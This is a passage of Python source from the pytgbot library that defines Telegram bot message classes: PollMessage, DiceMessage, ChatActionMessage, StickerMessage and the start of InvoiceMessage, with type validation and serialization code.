data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new PollMessage from a given dictionary.
:return: new PollMessage instance.
:rtype: PollMessage
"""
if not array: # None or {}
return None
# end if
data = PollMessage.validate_array(array)
return PollMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(pollmessage_instance)`
"""
return "PollMessage(question={self.question!r}, options={self.options!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, is_anonymous={self.is_anonymous!r}, type={self.type!r}, allows_multiple_answers={self.allows_multiple_answers!r}, correct_option_id={self.correct_option_id!r}, explanation={self.explanation!r}, explanation_parse_mode={self.explanation_parse_mode!r}, explanation_entities={self.explanation_entities!r}, open_period={self.open_period!r}, close_date={self.close_date!r}, is_closed={self.is_closed!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(pollmessage_instance)`
"""
return "PollMessage(question={self.question!r}, options={self.options!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, is_anonymous={self.is_anonymous!r}, type={self.type!r}, allows_multiple_answers={self.allows_multiple_answers!r}, correct_option_id={self.correct_option_id!r}, explanation={self.explanation!r}, explanation_parse_mode={self.explanation_parse_mode!r}, explanation_entities={self.explanation_entities!r}, open_period={self.open_period!r}, close_date={self.close_date!r}, is_closed={self.is_closed!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in pollmessage_instance`
"""
return (
key in ["question", "options", "receiver", "reply_id", "is_anonymous", "type", "allows_multiple_answers", "correct_option_id", "explanation", "explanation_parse_mode", "explanation_entities", "open_period", "close_date", "is_closed", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class PollMessage
class DiceMessage(ReturnableMessageBase):
"""
Use this method to send an animated emoji that will display a random value. On success, the sent Message is returned.
https://core.telegram.org/bots/api#senddice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param emoji: Emoji on which the dice throw animation is based. Currently, must be one of "🎲", "🎯", "🏀", "⚽", "🎳", or "🎰". Dice can have values 1-6 for "🎲", "🎯" and "🎳", values 1-5 for "🏀" and "⚽", and values 1-64 for "🎰". Defaults to "🎲"
:type emoji: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, receiver=None, reply_id=DEFAULT_MESSAGE_ID, emoji=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send an animated emoji that will display a random value. On success, the sent Message is returned.
https://core.telegram.org/bots/api#senddice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param emoji: Emoji on which the dice throw animation is based. Currently, must be one of "🎲", "🎯", "🏀", "⚽", "🎳", or "🎰". Dice can have values 1-6 for "🎲", "🎯" and "🎳", values 1-5 for "🏀" and "⚽", and values 1-64 for "🎰". Defaults to "🎲"
:type emoji: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(DiceMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(emoji, None, unicode_type, parameter_name="emoji")
self.emoji = emoji
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_dice(
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
emoji=self.emoji,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this DiceMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(DiceMessage, self).to_array()
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['emoji'] = u(self.emoji) # py2: type unicode, py3: type str
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the DiceMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(DiceMessage, DiceMessage).validate_array(array)
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['emoji'] = u(array.get('emoji')) if array.get('emoji') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new DiceMessage from a given dictionary.
:return: new DiceMessage instance.
:rtype: DiceMessage
"""
if not array: # None or {}
return None
# end if
data = DiceMessage.validate_array(array)
return DiceMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(dicemessage_instance)`
"""
return "DiceMessage(receiver={self.receiver!r}, reply_id={self.reply_id!r}, emoji={self.emoji!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(dicemessage_instance)`
"""
return "DiceMessage(receiver={self.receiver!r}, reply_id={self.reply_id!r}, emoji={self.emoji!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in dicemessage_instance`
"""
return (
key in ["receiver", "reply_id", "emoji", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class DiceMessage
class ChatActionMessage(ReturnableMessageBase):
"""
Use this method when you need to tell the user that something is happening on the bot's side. The status is set for 5 seconds or less (when a message arrives from your bot, Telegram clients clear its typing status). Returns True on success.
Example: The ImageBot needs some time to process a request and upload the image. Instead of sending a text message along the lines of "Retrieving image, please wait…", the bot may use sendChatAction with action = upload_photo. The user will see a "sending photo" status for the bot.
We only recommend using this method when a response from the bot will take a noticeable amount of time to arrive.
https://core.telegram.org/bots/api#sendchataction
Parameters:
:param action: Type of action to broadcast. Choose one, depending on what the user is about to receive: typing for text messages, upload_photo for photos, record_video or upload_video for videos, record_voice or upload_voice for voice notes, upload_document for general files, choose_sticker for stickers, find_location for location data, record_video_note or upload_video_note for video notes.
:type action: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
"""
def __init__(self, action, receiver=None):
"""
Use this method when you need to tell the user that something is happening on the bot's side. The status is set for 5 seconds or less (when a message arrives from your bot, Telegram clients clear its typing status). Returns True on success.
Example: The ImageBot needs some time to process a request and upload the image. Instead of sending a text message along the lines of "Retrieving image, please wait…", the bot may use sendChatAction with action = upload_photo. The user will see a "sending photo" status for the bot.
We only recommend using this method when a response from the bot will take a noticeable amount of time to arrive.
https://core.telegram.org/bots/api#sendchataction
Parameters:
:param action: Type of action to broadcast. Choose one, depending on what the user is about to receive: typing for text messages, upload_photo for photos, record_video or upload_video for videos, record_voice or upload_voice for voice notes, upload_document for general files, choose_sticker for stickers, find_location for location data, record_video_note or upload_video_note for video notes.
:type action: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
"""
super(ChatActionMessage, self).__init__()
assert_type_or_raise(action, unicode_type, parameter_name="action")
self.action = action
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_chat_action(
action=self.action,
chat_id=self.receiver,
)
# end def send
def to_array(self):
"""
Serializes this ChatActionMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
array = super(ChatActionMessage, self).to_array()
array['action'] = u(self.action) # py2: type unicode, py3: type str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the ChatActionMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
data = super(ChatActionMessage, ChatActionMessage).validate_array(array)
data['action'] = u(array.get('action'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new ChatActionMessage from a given dictionary.
:return: new ChatActionMessage instance.
:rtype: ChatActionMessage
"""
if not array: # None or {}
return None
# end if
data = ChatActionMessage.validate_array(array)
return ChatActionMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(chatactionmessage_instance)`
"""
return "ChatActionMessage(action={self.action!r}, receiver={self.receiver!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(chatactionmessage_instance)`
"""
return "ChatActionMessage(action={self.action!r}, receiver={self.receiver!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in chatactionmessage_instance`
"""
return (
key in ["action", "receiver"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class ChatActionMessage
class StickerMessage(ReturnableMessageBase):
"""
Use this method to send static .WEBP or animated .TGS stickers. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendsticker
Parameters:
:param sticker: Sticker to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a .WEBP file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type sticker: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, sticker, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send static .WEBP or animated .TGS stickers. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendsticker
Parameters:
:param sticker: Sticker to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a .WEBP file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type sticker: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(StickerMessage, self).__init__()
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(sticker, InputFile, unicode_type, parameter_name="sticker")
self.sticker = sticker
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_sticker(
sticker=self.sticker,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this StickerMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(StickerMessage, self).to_array()
if isinstance(self.sticker, InputFile):
array['sticker'] = self.sticker.to_array() # type InputFile
elif isinstance(self.sticker, str):
array['sticker'] = u(self.sticker) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the StickerMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(StickerMessage, StickerMessage).validate_array(array)
if isinstance(array.get('sticker'), InputFile):
data['sticker'] = InputFile.from_array(array.get('sticker'))
elif isinstance(array.get('sticker'), str):
data['sticker'] = u(array.get('sticker'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new StickerMessage from a given dictionary.
:return: new StickerMessage instance.
:rtype: StickerMessage
"""
if not array: # None or {}
return None
# end if
data = StickerMessage.validate_array(array)
return StickerMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(stickermessage_instance)`
"""
return "StickerMessage(sticker={self.sticker!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(stickermessage_instance)`
"""
return "StickerMessage(sticker={self.sticker!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in stickermessage_instance`
"""
return (
key in ["sticker", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class StickerMessage
class InvoiceMessage(ReturnableMessageBase):
"""
Use this method to send invoices. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendinvoice
Parameters:
:param title: Product name, 1-32 characters
:type title: str|unicode
:param description: Product description, 1-255 characters
:type description: str|unicode
:param payload: Bot-defined invoice payload, 1-128 bytes. This will not be displayed to the user, use for your internal processes.
:type payload: str|unicode
:param provider_token: Payments provider token, obtained via Botfather
:type provider_token: str|unicode
:param currency: Three-letter ISO 4217 currency code, see more on currencies
:type currency: str|unicode
:param prices: Price breakdown, a JSON-serialized list of components (e.g. product price, tax, discount, delivery cost, delivery tax, bonus, etc.)
:type prices: list of pytgbot.api_types.sendable.payments.LabeledPrice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param max_tip_amount: The maximum accepted amount for tips in the smallest units of the currency (integer, not float/double). For example, for a maximum tip of US$ 1.45 pass max_tip_amount = 145. See the exp parameter in currencies.json, it shows the number of digits past the decimal point for each currency (2 for the majority of currencies). Defaults to 0
:type max_tip_amount: int
:param suggested_tip_amounts: A JSON-serialized array of suggested amounts of tips in the smallest units of the currency (integer, not float/double). At most 4 suggested tip amounts can be specified. The suggested tip amounts must be positive, passed in a strictly increased order and must not exceed max_tip_amount.
:type suggested_tip_amounts: list of int
:param start_parameter: Unique deep-linking parameter. If left empty, forwarded copies of the sent message will have a Pay button, allowing multiple users to pay directly from the forwarded message, using the same invoice. If non-empty, forwarded copies of the sent message will have a URL button with a deep link to the bot (instead of a Pay button), with the value used as the start parameter
:type start_parameter: str|unicode
:param provider_data: A JSON-serialized data about the invoice, which will be shared with the payment provider. A detailed description of required fields should be provided by the payment provider.
:type provider_data: str|unicode
:param photo_url: URL of the product photo for the invoice. Can be a photo of the goods or a marketing image for a service. People like it better when they see what they are paying for.
:type photo_url: str|unicode
:param photo_size: Photo size
:type photo_size: int
:param photo_width: Photo width
:type photo_width: int
:param photo_height: Photo height
:type photo_height: int
:param need_name: Pass True, if you require the user's full name to complete the order
:type need_name: bool
:param need_phone_number: Pass True, if you require the user's phone number to complete the order
:type need_phone_number: bool
:param need_email: Pass True, if you require the user's email address to complete the order
:type need_email: bool
:param need_shipping_address: Pass True, if you require the user's shipping address to complete the order
:type need_shipping_address: bool
:param send_phone_number_to_provider: Pass True, if user's phone number should be sent to provider
:type send_phone_number_to_provider: bool
:param send_email_to_provider: Pass True, if user's email address should be sent to provider
:type send_email_to_provider: bool
:param is_flexible: Pass True, if the final price depends on the shipping method
:type is_flexible: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Pay total price' button will be shown. If not empty, the first button must be a Pay button.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
"""
def __init__(self, title, description, payload, provider_token, currency, prices, receiver=None, reply_id=DEFAULT_MESSAGE_ID, max_tip_amount=None, suggested_tip_amounts=None, start_parameter=None, provider_data=None, photo_url=None, photo_size=None, photo_width=None, photo_height=None, need_name=None, need_phone_number=None, need_email=None, need_shipping_address=None, send_phone_number_to_provider=None, send_email_to_provider=None, is_flexible=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send invoices. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendinvoice
Parameters:
:param title: Product name, 1-32 characters
:type title: str|unicode
:param description: Product description, 1-255 characters
:type description: str|unicode
:param payload: Bot-defined invoice payload, 1-128 bytes. This will not be displayed to the user, use for your internal processes.
:type payload: str|unicode
:param provider_token: Payments provider token, obtained via Botfather
:type provider_token: str|unicode
:param currency: Three-letter ISO 4217 currency code, see more on currencies
:type currency: str|unicode
